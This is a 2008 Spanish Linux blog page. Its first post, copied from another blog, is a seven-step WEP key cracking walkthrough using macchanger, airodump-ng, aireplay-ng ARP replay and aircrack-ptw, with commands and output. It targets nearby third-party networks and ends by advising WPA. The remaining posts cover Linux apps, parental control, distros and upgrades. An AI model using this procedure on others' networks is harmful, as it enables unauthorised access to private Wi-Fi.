jump to navigation

Auditando contraseñas WEP en siete pasos Abril 30, 2008

Posted by jarvega in Manuales.
Tags: , , , , ,
add a comment

Como se que les encanta este tema, pego y copio desde Linuxman este interesante post.  que les aproveche.

—————————————–

Pues aquí me tienen, una vez que encontré una antena que me funcionara y al ver que había varias redes disponibles no me pude aguantar las ganas de auditar las contraseñas WEP que encontré a mi alrededor.

Hago la aclaración de que esta es una auditoría de seguridad pero les puedo adelantar la conclusión: La configuración por defecto de los accesos inalámbricos de Infinitum es altamente insegura.

Material necesario.

  • Tarjeta de red inalámbrica, en mi caso use la que siempre me ha acompañado en este blog, la multimencionada ENUWI-G2.
  • Una antena, esta es opcional, pero se puede utilizar para mejorar la calidad del enlace, puede ser la EZ-12 o la del escurridor de aluminio que a mi me ha funcionado muy bien.
  • Una distribución de Linux, utilicé wifiway porque fue la que mejor me reconoció mi tarjeta de red inalámbrica, pero existen otras opciones como Wifislax o Bactrack .

Los pasos a seguir.

Hago la aclaración que esta serie de pasos es para wifiway, pero supongo que se pueden aplicar a las otras distros antes mencionadas. También modifique los datos reales, para proteger la identidad de los personajes (siempre quisé escribir eso P ).

Todos estos pasos se ejecutan desde una terminal (terminalofóbicos abstenganse ;) )

1.- Verificar si se reconoció la tarjeta de red inalámbrica.

iwconfig

lo        no wireless extensions.

eth0      no wireless extensions.

Warning: Driver for device wlan0 has been compiled with version 22
of Wireless Extension, while this program supports up to version 20.
Some things may be broken...

wlan0     802.11b/g  Mode:Monitor  Channel=1  Bit Rate=11 Mb/s
          Tx-Power=11 dBm
          Retry:on   Fragment thr:off
          Link Quality=84/100  Signal level=-236 dBm  Noise level=-240 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Como pueden ver si la reconoció, la tarjeta es la wlan0, aunque me lanza una advertencia de que algo pude andar mal, y en efecto, la luz led de la tarjeta no prende, pero eso no evitó que funcionara para este experimento.

2.- Cambio de la mac address.

macchanger -m 00:11:22:33:44:56 wlan0

Current MAC: 00:11:22:33:44:55 (Cimsys Inc)
Faked MAC:   00:11:22:33:44:56 (Cimsys Inc)

Este paso lo realizo para no tener que acordarme de mi Mac Addres )

3.- Búsqueda de las redes inalámbricas en los alrededores.

airodump-ng wlan0

 CH 13 ][ Elapsed: 2 mins ][ 2008-03-16 11:23 

 BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 00:00:00:00:00:01    2        4        0    0   6  22. WEP  WEP         2WIRE000
 11:11:11:11:11:11   15       53        0    0   1  54. WEP  WEP         INFINITUM0000
 00:00:00:00:00:02    5       34        0    0   6  54. OPN              linksys

En estos resultados vamos a tomar nota de varios datos importantes.

Como pueden ver la red que tiene una mejor calidad de señal es la INFINITUM0000 ya que el valor de PWR myor que el de los demás.

De ahí tomamos el BSSID (11:11:11:11:11:11), el canal en que esta operando (Canal 1) y el ESSID (INFINITUM0000), elegimos esta red porque tiene a mejor calidad de enlace y un método de protección (WEP) muy pobre.

4.- Iniciar la captura.

Iniciando la captura

airodump-ng -w captura -c 1 wlan0

captura es el nombre del archivo que va a recibir la información que vamos a recolectar. Noten también que -c 1 indica que vamos a trabajar en el canal 1.

Es importante que no cerremos esta ventana, de lo contrario lo siguiente que hagamos no servirà de nada. Los siguientes pasos se hacen en una nueva terminal.

5.- Asociar la red inalámbrica.

aireplay-ng -1 0 -e INFINITUM0000 -a 11:11:11:11:11:11 -h 00:11:22:33:44:56 wlan0

11:26:36  Waiting for beacon frame (BSSID: 11:11:11:11:11:11)
11:26:36  Sending Authentication Request
11:26:36  Authentication successful
11:26:36  Sending Association Request
11:26:36  Association successful -)

Sí aparece el mensaje de Association successful -) estamos listos para continuar. Al principio batallé con este paso, si tienen algún problema es casi seguro que se trata de una mala calidad de señal, pueden estar muy lejos del punto de acceso inalámbrico.

6.- Iniciar la captura de paquetes.

aireplay-ng -3 -b 11:11:11:11:11:11 -h 00:11:22:33:44:56 wlan0

Saving ARP requests in replay_arp-0316-112829.cap
You should also start airodump-ng to capture replies.
Read 598 packets (got 214 ARP requests), sent 1172 packets...(78 pps)

En este punto hay que estar al pendientes, cuando se logren más de 100,000 ARP’s terminamos el proceso (presionando Ctrl+C). Se puede tardar de 10 minutos a media hora dependiendo de la calidad del enlace.

7.- Buscar el archivo .cap con mayor tamaño y encontrar la contraseña.

Llave encontrada

Se acuerdan que en el paso 4 establecimos el nombre del archivo como captura (de hecho puede ser cualquier nombre), bueno pues es normal que en ocasiones se guarde más de un archivo, se distinguen porque les sigue un número, el que debemos de elegir es el que tiene mayor tamaño. Que aquí fue el archivo número 2.

aircrack-ptw captura-02.cap

This is aircrack-ptw 1.0.0
For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
allocating a new table
bssid = 11:11:11:11:11:11  keyindex=0
stats for bssid 11:11:11:11:11:11  keyindex=0 packets=159646
Found key with len 05: 01 23 34 56 78

Y si todo salio bien en menos de 10 segundos obtendremos la contraseña, si en 10 segundos o menos, todo depende de la potencia de nuestro equipo.

Conclusiones.

Con eso es más que suficiente para encontrar la contraseña WEP de un enlace inalámbrico, lamentablemente este tipo de protección es el más utilizado por los Infinitum de Telmex por eso es poco recomendable dejar estos aparatos con su configuración de fabrica, lo mejor es ajustarla a otro tipo de protección como WPA, desconozco si lo 2wire lo permiten pero los linksys permiten restringir el acceso a ciertas Mac address lo que protege aún más una red inalámbrica.

Top 10 de mis aplicaciones en Linux Abril 30, 2008

Posted by jarvega in Comentarios sueltos.
Tags: , , ,
add a comment

He aqui los 10 programas imprescindibles que funcionan en Linux (según mi criterio y enfocados a Ubuntu GNOME, mi ambiente preferido) para los que apenas están empezando en el mundo del pingüino.

No están ordenados del más al menos importante, pero trataré de hacerlo así:

  • Amarok: Si eres un usuario que exige en funcionalidades al reproductor de música, esta es tu opción. Para mí el mejor que hay ya que compensa su “pesadez” con los cientos de opciones que trae, y sencillamente no exagero. Quizás el único inconveniente es que necesita librerias de KDE, pero eso es un mal muy menor, sin duda. Amarok es muy versátil, sin nada que envidiarle a Microsoft Windows Media Player. En segundo lugar, en GNOME tenemos a Banshee, el cual es también muy ágil. Para mi, solo queda en segundo sitio, por que no grava CD en modo datos, lo cual para mis podcast en el auto es importante.
  • K3B: “Si Nero fuera un dios en Windows, K3B sería su avatar en Linux”. ¿Para que Nero? no te preocupes, este completo software para grabar CD’s y DVD’s hará que te olvides del “Coliseo Quemándose”. Nada complicado ni con opciones rebuscadas, con una interfaz completa y a la vez amigable, incluso lleva algunas funciones extra que no tiene Nero (obviamente éste tiene otras que K3B no, pero innecesarias para usuarios comúnes). Ahora que, dicen por ahi que Nero para Linux ya esta disponible… Ubuntu GNOME trae ahora a Brasero, muy funcional, aunque sin la elegancia de K3B.
  • OpenOffice Suite: Parece que las palabras “PowerPoint”, ”Word” y ”Excel” llegan instantáneamente a la cabeza de un usuario al oir “presentación”, “documento” y “hoja de cálculo”. No más, pues en el mundo del software libre también hay suites de oficina como OpenOffice que incluye Write (Procesador de textos), Impress (Presentaciones) y Calc (Hojas de cálculo). Les juro que personas que manejaron los software de Microsoft no notarán mucho la diferencia con los de OpenOffice, funciones similares, herramientas casi idénticas y la compatibilidad con archivos nativos de Word, PowerPoint y Excel son las cosas que hacen fuerte a esta Suite “Libre”. Además, las funciones y uso de formatos de PDF en Openoffice es transparente y libre. ¿En windows? Pobres usuarios…
  • Pidgin: Hasta hace poco, pensaba que Kopete o AMSN eran mejores, pero la pequeña palomilla ha demostrado su poder en la mensajería instantánea. Un ambiente multiprotocolo, es decir, puede conectarse con diferentes tipos de cuenta, ya sea AOL Messenger, MSN, Yahoo Messenger, ICQ, entre otros, ofreciendo también la posibilidad de tener varias cuentas abiertas; desde luego que la funcionalidad de este programa es muy completa, con una amplia gamma de opciones y configuraciones que lo hacen mi preferido. ¿Licencia? Tienen Licencia GPL.
  • Firefox: Lo que hace tan popular a Firefox es la manera en que uno personaliza las funciones del navegador, agregando las extensiones (pequeños programitas) que uno quiera, ya sea de bloqueo de publicidad/scripts hasta el pronóstico del clima, antes lo malo era que en Linux consumía muchos recursos pero, la nueva versión 3.0 es MUY veloz, incluso, mucho más que Opera. Firefox: GPL / Opera: Gratuito
  • The Gimp: Para los que acostumbraban realizar firmas y avatares en Photoshop, este no los defraudará. No lo uso mucho pero al ver wallpapers hechos por este programa decidí agregarlo al top ten, realmente quedan impresionantes las imágenes. Especialmente para diseñadores, pero no exclusivo. Licencia: GPL
  • Thunderbird: Es el que uso para checar mi correo, tanto hotmail como gmail. Simple pero potente al agregarle extensiones (como Firefox). Un sustituo perfecto de Outlook. Incluso, ahora es mi lector de RSS, y es de garn desempeño. Evolution es poderoso, pero algo pesado, pero Thunderbird hace que te olvides de otros clientes de correo.
  • VLC: No podía faltar el reproductor de videos. Liviano, sin ningun problema es el mejor reproductor multimedios. Lo uso actualmente.
  • Wine: ¿Necesitas ejecutar un programa para Windows y no quieres reiniciar tu PC? Wine al rescate; Este no es un emualdor de las ventanitas, es Wine. Corre muchos de las aplicaciones que nos dijeron, solo eran para Windows, y lo hace mejor que en ese sistema
  • CryptKeeper: Las funciones de este programa, solo por software de paga existen en Windows. Y no imita a nadie y pone rojos de verguenza a muchos. El “Guardián de la Cripta” es un programa que te permite tener carpetas o archivos privados, que solo estarán para ti, y nadie más. Muy seguro, confiable, paar ocultar de la vista lo que no quieras que nadie mire.

Hasta aquí la lista, va enfocado más que nada para los que no saben qué elegir ni que software hay en este novedoso Sistema Operativo. Vuelvo a decir, este Top Ten lo hice según mi criterio, no soy un gurú pero tampoco me considero un novato.

Suerte para los que empiezan y no desistan

Avisenme si tienen otras aplicaciones preferidas.

Control parental en Ubuntu Linux Abril 16, 2008

Posted by jarvega in Nuevo software.
Tags: , , ,
add a comment

La verdad, habia pensado que bajo Linux eso no existia, por la novatez de nuestro sistema operativo: ME EQUIVOQUE !! Y a lo grande…

Resulta que hay más de una solución:

Glubble:

Es una poderosa extensión para firefox, por tanto, es para Linux, Windows o Mac, aunque estrictamente no es lo que yo buscaba.

Gubble se convierte en guardián de cada página que visita el usuario. Si el usuario (casi siempre, su hijo) le pregunta a Usted por permisos para ver un nuevo website (que no esta incluido en la colección de Gubble), un nuevo mensaje aparecerá en el firefox de su oficina – o en otra terminal de su red -. Usted le responderá en ese momento o lo dejará para despúes. Para mi, es sorprendente !!!

Gubble es, en palabras de su website, “una compilación de sitios web”, muy bien estructurado.

El funcionamiento de la extensión se basa en la construcción colaborativa entre todos sus usuarios de listas de sitios confiables. Incluso filtra los resultados generados por los buscadores. En definitiva una herramienta interesante para padres e instituciones educativas que no quieren renunciar a las bondades de Internet y necesitan herramientas para filtrar los contenidos. (Aporte de Linuxeando)

Yo buscaba algo más eficiente y con control del tiempo. Para descargas, vayan al siguiente link:

Parental Control 2.1:

Incluido en el Ubuntu Christian Edition (Oye, debe ser bueno), se apoya en el dansguardian. Me parece una buena opcion. Tendra control del tiempo?

Acept:

En la tierra de mis abuelos, Andalucía, están desarrollando una aplicación de control parental más potente, que permitirá, además del filtrado de webs, limitar aplicaciones y el tiempo de uso del ordenador. El proyecto se llama acept, y puede integrarse a Guadalinex o Edubuntu de forma nativa. (Aporte de Draxus.org)

Este si me gusta, parece lo que yo he decidido usar y lo probaré.

Control Parental:

Copio y pego desde Draxus:

Podéis descargarlo desde aquí: Parental control.tar.gz. Simplemente extraer el contenido, ejecutar install.sh y aceptar todas los mensajes que salgan. Para desinstalar, ejecutar uninstall.sh y aceptar los avisos. Para una configuración más detallada, hay una herramienta en Sistema, Administración, Configure the parental control filter, aunque la interfaz no está muy cuidada y en inglés.

Que buen sitio es Draxus.org.

Ubuntu iES: Español para tu llave USB o Pen Drive Abril 14, 2008

Posted by jarvega in Nuevo software.
add a comment

Desde hace algún tiempo he venido hablando con amigos sobre cual podría ser al versión de GNU/Linux para mi pequeña llave USB de 2.0 Gb.

Y de alli que probé DSL (Dam Small Linux) y la pequeña y maravillosa Slax, la cual definitivamente instalé.     Solo me preocupaba la paqueteria que utilizan en Slax, la cual veo decadente, donde cada paquete de software es un módulo.

Pero hoy, hay una nueva opción que creo vale la pena analizar, paar mi pequeña llave USB:  UbuntuiES.

Basada en nuestro Ubuntu Gutsy, este sistema operativo de casi 1 Gb (Tamaño, su principal punto en contra) se adapta sin problemas a nuestra llave.

Vayan a la direccíon de ubuntu IES,  descarguenlo y tomen de alli los tutoriales de isntalación.  Son muy sencillos, y luego em cuentan como les fue.   :-) )

Hardy Heron: Upgrade o Nueva Instalación Abril 14, 2008

Posted by jarvega in Nuevo software.
add a comment

Por su importante punto de vista, e incluso, para mi desición final al respecto, copio y pego desde la ventana muerta:

Ahora que se va acercando Ubuntu 8.04 hay una pregunta que muchos tenemos en la mente: ¿Actualizo o hago una instalación limpia?

Es una pregunta muy importante, pero no se puede elegir sin saber antes los pros y contras de ambas opciones:

Instalación limpia:

Pros:

  • No se cambia nada en la rutina de instalación.
  • Puedes cambiar la tabla de particiones, si quieres hacer algún cambio.
  • Te encuentras con un sistema “virgen”, sin ningún tipo de modificaciones.

Contras:

  • Todas las configuraciones y cambios hechos desaparecen (asumiendo que no tienes la carpeta /home aparte).
  • Los cambios y hacks que habías hecho, y probablemente quieras volver a tener, tendrás que hacerlos de nuevo.
  • Se tarda más tiempo.
  • Vuelves a poner a cero el contador de “meses sin reinstalar Ubuntu”

Instalación sucia o actualización:

Pros:

  • Muy simple. 2 comandos y un reinicio y ya lo tienes actualizado.
  • Las modificaciones que hiciste al sistema “sobrevivirán”.
  • La mayoría de las preferencias y configuraciones de los programas actualizados seguirán funcionando bien.
  • Puedes estar orgulloso y contar a todo el mundo que llevas 10 años sin reinstalar el SO ;)

Contras:

  • Si algo no está funcionando correctamente, rara vez se arreglará actualizando.
  • Algunas modificaciones del sistema no funcionarán.
  • A veces las nuevas características no se instalan apropiadamente con una actualización.
  • No tienes un CD de Ubuntu que dar a tus amigos cuando has terminado de actualizar.

Ahora, dependiendo de tus preferencias elegirás una manera u otra. Yo he preferido actualizar pero me estoy replanteando si volver a empezar con un sistema casi limpio, porque tengo el /home aparte.

Personalmente prefiero una instalación desde cero a una actualización, por algunas de la ventajas que antes os he expuesto.

Basado en un artículo de Linux Journal.

Creo que haré nueva instalación…

Tres Distros que deberias probar Abril 14, 2008

Posted by jarvega in Comentarios sueltos.
add a comment

Una de las fortalezas de Linux, es su amplia gama de variaciones, con distros que van desde campos como las redes, los graficos, la seguridad, hasta las más optimas para el usuario final.

Desde Zona Linux, nos llega este interesante post sobre distros que deberiamos probar en nuestras PC’s.

Se trata de: Puppy Linux y Damn Small Linux que permiten aprovechar equipos viejos y UbuntiES que se puede correr desde un pendrive o memoria USB.

Puppy Linux

Sitio: puppylinux.org
Descarga: PuppyLinux
Para leer más:

Damn Small Linux

Sitio: damnsmalllinux.org
Descarga: Damn Small Linux
Para leer más:

UbuntiES

Sitio: ubuntuies.com
Descarga: UbuntiES
Para leer más:

Personalmente, me falta probar Ubuntu iES, me muero por probarla !!

Una de wallpapers Abril 14, 2008

Posted by jarvega in Paginas Interesantes.
add a comment

Antes nos llamaban NERDS, hoy dia algo diferente,  geeks, pero lo cierto es que nuestra forma de ser no ha cambiado.

En la página de negocios para Nerds a mucha honra, me encuentro 218 wallpapers de alta calidad, muy buenos y muy interesantes, además, todos gratis.    Que les aproveche !!

Los Simpson en manga?? Abril 14, 2008

Posted by jarvega in Comentarios sueltos.
add a comment

Me he encontrado esta simpática imagen manga de Los Simpson, los populares simplones norteamericanos, en Todointeresante.com.

Me encanta ver a la Sra Simpson (Claro, me encantaria verla en babydoll…)

Mucho tiempo transcurrido desde mi último post Abril 14, 2008

Posted by jarvega in Comentarios sueltos.
add a comment

Sin pena ni gloria, más bien por pura pereza, he dejado bastante de escribir en este blog.

Sin embargo, y ante la salida de operación del Blog de Maverick y del blog de 120% Linux, mi más sentido pésame, pos ni modo:

A escribir se ha dicho !!!!